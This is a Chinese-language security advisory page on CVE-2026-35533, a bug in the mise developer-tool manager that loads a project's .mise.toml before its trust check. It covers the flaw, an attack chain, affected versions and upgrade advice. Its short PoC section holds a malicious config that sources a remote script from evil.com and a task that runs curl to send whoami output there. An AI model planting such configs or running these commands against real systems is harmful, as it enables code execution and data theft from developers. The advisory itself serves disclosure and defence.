CVE-2026-35533 CVSS 7.7 高危

CVE-2026-35533 mise 代码执行漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35533

漏洞类型

代码执行

CVSS评分

7.7 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

mise

漏洞概述

mise是一款开发工具管理器。在2026.2.18至2026.4.5版本中，存在一个严重的逻辑漏洞。该漏洞允许攻击者在信任检查运行之前，通过本地项目中的恶意.mise.toml文件绕过信任控制机制。由于配置加载顺序错误，攻击者可利用此漏洞执行危险指令，导致代码执行，从而严重威胁系统的机密性、完整性和可用性。

技术细节

该漏洞的根本原因在于 mise 处理配置文件加载与信任验证的时序逻辑错误。正常情况下，工具应先验证配置文件来源的信任状态，仅在受信任时才加载并执行其中的指令。然而，受影响版本的 mise 在解析本地项目的 .mise.toml 文件时，会先加载其中的 trust-control 设置，随后才进行信任检查。攻击者只需在目标代码仓库中植入一个精心构造的 .mise.toml 文件。当受害者在受影响版本的 mise 环境下进入该目录并触发相关操作（如运行任务）时，mise 会错误地认为该恶意文件是受信任的。随后，解析器会执行文件中定义的危险指令，例如通过 [env] _.source 加载外部恶意脚本、执行钩子或运行任意任务。由于 CVSS 向量包含 S:C（Scope Changed），这表明攻击可能突破用户权限限制，获取更高权限或影响系统组件。

攻击链分析

STEP 1

准备攻击载荷

攻击者创建包含恶意指令（如_.source或任务）的.mise.toml文件。

STEP 2

植入恶意文件

攻击者将恶意.mise.toml文件提交到目标Git仓库或诱导受害者下载包含该文件的代码包。

STEP 3

触发漏洞

受害者使用受影响版本的mise工具进入包含恶意文件的目录并执行相关命令。

STEP 4

绕过信任检查

mise在加载配置时未先进行信任验证，错误地将恶意配置视为可信。

STEP 5

执行代码

mise解析并执行.mise.toml中的危险指令，攻击者获取系统控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Malicious .mise.toml configuration file
[env]
# This directive sources a remote script, leading to RCE
_.source = "https://evil.com/exploit.sh"

[tasks.pwn]
# Arbitrary command execution
description = "Backdoor task"
run = "curl https://evil.com/steal?data=$(whoami)"

影响范围

mise >= 2026.2.18, <= 2026.4.5

防御指南

临时缓解措施

建议用户立即检查当前使用的mise版本，若处于受影响范围内，请务必升级至最新版本。在升级前，避免在不受信任的代码仓库中使用mise自动加载功能，或手动审查.mise.toml文件内容。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表